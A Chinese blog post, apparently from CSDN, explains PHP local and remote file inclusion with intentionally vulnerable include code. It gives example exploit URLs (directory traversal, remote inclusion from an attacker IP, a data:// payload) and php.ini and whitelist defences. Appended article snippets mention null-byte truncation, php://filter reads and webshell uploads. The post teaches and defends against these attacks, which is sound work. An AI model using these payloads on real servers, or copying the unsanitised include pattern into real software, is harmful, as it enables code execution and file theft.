php本地文件包含 截断,php本地文件包含&远程文件包含

最新推荐文章于 2022-07-01 23:01:19 发布
最新推荐文章于 2022-07-01 23:01:19 发布
阅读量144 收藏
点赞数
文章标签: php本地文件包含 截断

由头:面试的时候被问到了,有些东西还是实践的太少,写此博客记录一下。

php文件包含函数:

include()

require()

include_once()

require_once()

本地文件包含:

include($_GET['test']);

?>

exploit:

包含当前目录的 lfi.txt(内容为<?php phpinfo();?>):

0818b9ca8b590ca3270a3433284dd417.png

0818b9ca8b590ca3270a3433284dd417.png

跨目录包含:

http://localhost:81/lfi/lfi.php?test=../lfi.txt #包含上层目录的lfi.txt文件

http://localhost:81/lfi/lfi.php?test=/lfi_in/lfi.txt #包含内层目录的lfi.txt文件

防御:

防止跨目录:

在php.ini中设置open_basedir

open_basedir = C:\Program Files\phpStudy\WWW\lfi #限制在当前目录下(包括子目录)

open_basedir = C:\Program Files\phpStudy\WWW\lfi\ #限制在当前目录下(不包括子目录)

防止本地文件包含:

使用枚举

$file =$_GET['test'];

switch ($file) {

case 'lfi.txt':

include('./lfi.txt');

break;

default:

include('./notexists.txt');

break;

}

?>

远程文件包含:

include($_GET['file'].'txt');

?>

exploit:

http://localhost:81/lfi/rfi.php?file=http://ip_address/php/rfi/rfi.txt?

技巧:?被解释成url中的querystring,可用来在 远程文件包含 时 截断 代码中后面内容。

防御:

php.ini配置文件里allow_url_include=off

文件包含利用技巧:

1.远程文件包含时 利用 data://  (>5.2.0) 或者 input://协议

/rfi.php?file=data:text/plain,<?php %20phpinfo();?>

weixin_39888268
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctf本地包括_新手入门之本地文件包含(附靶机文件)
weixin_39769984的博客
12-29 731
概述通过加强对本地文件包含(LFI)渗透测试技术的研究,可以帮助渗透测试人员和学生在未来的渗透测试过程中,识别和测试LFI漏洞。在Web程序渗透测试中,利用本文中的技术发现的LFI漏洞是渗透测试中的典型漏洞。此外,在本文中提到有一些技术,在CTF大赛中也经常被利用。什么是本地文件包含(LFI)漏洞?LFI允许攻击者通过浏览器包含一个服务器上的文件。当一个WEB应用程序在没有正确过滤输入数据的情况下...
文件包含中过滤了php,文件包含漏洞---php协议
weixin_32480335的博客
03-21 721
一、原理1、概念:在php代码中,总会有一些代码我们会经常用到,这时引入了文件包含函数,可以通过文件包含函数把这些代码文件包含进来,直接使用文件中的代码,这样提高了我们的工作效率。2、文件包含函数:include():如果发生错误,会产生一个警告然后继续执行脚本include_once():与include()相同,如果文件之前被包含过则不再包含require():会停止执行代码require_o...
php本地文件包含 截断,php远程文件包含截断问题
weixin_39951929的博客
03-13 383
今天在学习《白帽子讲web安全》一书是,提到一个php远程文件包含漏洞可以从攻击者服务器中的一个写好的攻击脚本中远程执行命令服务器中有漏洞的页面代码为:#test.php#error_reporting(0);$route="share";$basePath=$_GET['param'];if ($route == "share"){require_once $basePath.'/action/...
php 文件包含 截断,【原创】WEB安全第五章 漏洞学习与利用06文件包含截断
weixin_30789475的博客
03-13 294
WEB安全第五章 漏洞学习与利用06文件包含截断1、00截断法00字符截断(php<5.3.4)(需要 magic_quotes_gpc=off)/etc/passwd/etc/passwd%00http://include.moonteam.com/file02.php?file=x.jpg%0000字符截断(php<5.3.4)(需要 magic_quotes_gpc=off)/e...
php本地包含
kali_linux的专栏
01-02 1016
php渗透测试 php文件包含 演示
php本地文件包含 截断,脚本本地/远程文件包含/读取及文件名截断漏洞FUZZ工具详解...
weixin_35637837的博客
03-13 418
脚本的文件包含漏洞可以说是层出不穷,苦于市面上没有好的功能全面的有针对性的开源工具做参考,现在就文件包含的几种典型漏洞为例子。此插件可以本地测试运行当做一个fuzz工具,也可以在bugscan上做为一个功能模块运行代码如下,要以先看assign函数,再看audit函数,注释详细清晰:#!/usr/bin/env python# -*- coding: utf-8 -*-# 脚本语言本地/远程,文件...
php远程文件包含截断问题
weixin_30674525的博客
01-24 80
今天在学习《白帽子讲web安全》一书是,提到一个php远程文件包含漏洞 可以从攻击者服务器中的一个写好的攻击脚本中远程执行命令 服务器中有漏洞的页面代码为: #test.php#error_reporting(0); $route="share"; $basePath=$_GET['param']; if ($route == "share") { require_on...
技术分享从浅入深学习PHP文件包含.pdf
最新发布
02-27
##### 限制包含文件的后缀名 如果对文件后缀名进行了限制,例如只允许包含`.php`文件,攻击者仍然可能找到绕过的方法: 1. **%00截断**:在PHP版本低于5.3.4的情况下,如果`magic_quotes_gpc`设置为`Off`,则可以...
LFIboomCTF:本地文件包含突破实践原始码以及相应协议利用指南
03-23
PHP截断包含; PHP内置伪协议利用。 PHP文件包含函数有以下样式: 要求() require_once() 包括() include_once() include和require区别主要是,include在包含的过程中如果出现错误,会引发一个...
【基础篇】第05篇:PHP代码审计笔记--文件包含漏洞1
08-03
本文旨在深入探讨“文件包含漏洞”的一种特殊形式——“有限制的本地文件包含”,并重点分析其中提到的三种技术手段:%00截断、路径长度截断以及点号截断。 #### 一、文件包含漏洞简介 文件包含漏洞是指攻击者通过...
php本地文件包含&远程文件包含
think_ycx的专栏
04-07 7748
本地文件包含&远程文件包含
php本地文件包含木马,PHP本地文件包含漏洞的新突破
weixin_35264158的博客
03-26 72
Beats By Dr Dre Studio Pittsburgh Steelers HighDefinition UK:Beats By Dr.Dre Studio Colorful Champagne Limited Edition UK,Beats By Dr.Dre Studio Colorware Chrome Limited Edition UK,Beats By Dr.Dre Stu...
PHP绕过远程文件头限制,利用PHP应用程序中的远程文件包含(RFI)并绕过远程URL包含限制...
weixin_42514921的博客
03-21 297
前言文章讲诉了如何绕过远程URL包含限制。在PHP开发环境php.ini配置文件里”,allow_url_include“为“off”的情况下,不允许PHP加载远程HTTP或FTP url包含远程文件。但是使用SMB依旧可以加载。攻击思路攻击者需要配置SMB服务器,启用匿名浏览访问。利用有漏洞的PHP代码从SMB共享里访问PHP Webshell。配置php.ini文件禁用 "allow_url_...
文件包含漏洞(二)
不秃头的程序Yang
07-01 1181
2、实操 2.1 虚拟机搭建test.php 1、文件包含%00 截断 符号 URL编码 # %23 ? %3f 00 %00 2.2 环境搭建
文件包含漏洞一览
Amire0x的小乐园
11-08 490
文件包含 原因 文件包含函数加载的参数没有经过过滤或者严格的定义,可以被用户控制,包含其他恶意文件,导致了执行了非预期的代码。 php文件包含相关函数都是无论其参数的扩展名是什么,都会将其内 容作为php代码解析,这可能就会造成任意的php代码执行。 如果一个功能需要包含用户传来的参数时,且开发者又没有对用户的输入进行检测和过滤,那么就 很可能使攻击者利用该功能进行文件包含漏洞的攻击。 相关函数 引起该漏洞的通常是 include() include() 如果出错的话,只会提出警告,会继续执行后
【文件上传】zip伪协议上传解析
serendipity1130的博客
08-29 1928
1.打开界面是登陆框,查看源码,发现有文件包含include($_GET['file']) 2.然后根据题目名称:文件上传,访问网址:/upload.php发现了文件上传点,先上传了jpg图片,发现不能用菜刀连接,应该是无法解析jpg。 3.因为有文件包含,所以考虑到使用伪协议包含木马图片的文件进行菜刀连接,因为都有过滤,最终尝试了zip伪协议可以进行访问。 4.方法:首先制作一句话木马的zip包,然后将后缀名改为jpg,进行上传,上传成功后复制图片地址,可以发现图片的地址为upload/2.jpg
文件包含漏洞
nobugnomoney的博客
03-23 5050
一、文件包含漏洞原理 PHP语言提供的文件包含功能太强大,太灵活,所以包含漏洞常常出现在PHP中,但不只是PHP中有包含漏洞,其他语言也有包含漏洞,如java等,本篇主要以PHP为例讲解原理及其利用技巧: PHP提供4个文件包含的函数 1、include():找不到文件时继续执行,只会警告 2、include_once():与include()类似,只是如果文件中的代码已被包含,则不会再次包含 3、require():找不到文件时会爆出致命的错误; 4、require_once():与上述的类似; 1、本地
web入门-文件包含
wo41ge的博客
11-28 3304
web78~php伪协议 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 直接payload ?file=php://filter/read=convert.base64-encode/resource=flag.php web79~Data协议 <?php if(isset($_GET['file
【转载】php伪协议实现命令执行的七种姿势
gclome的博客
11-08 326
原文 首先归纳下常见的文件包含函数:include、require、include_once、require_once、highlight_file 、show_source 、readfile 、file_get_contents 、fopen 、file,计划对文件包含漏洞与php封装协议的利用方法进行总结,本篇先总结下一些封装协议,涉及的相关协议:file://、php://filter、php://input、zip://、compress.bzip2://、compress.zlib://、da
PHP代码审计:文件包含漏洞详解与利用工具
"本文介绍了PHP代码审计中的一个常见安全问题——文件包含漏洞,特别是针对本地文件包含的几种利用方式,包括%00截断、路径长度截断和点号截断,并提供了相关漏洞利用工具和常见文件路径。" 在PHP编程中,文件包含...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值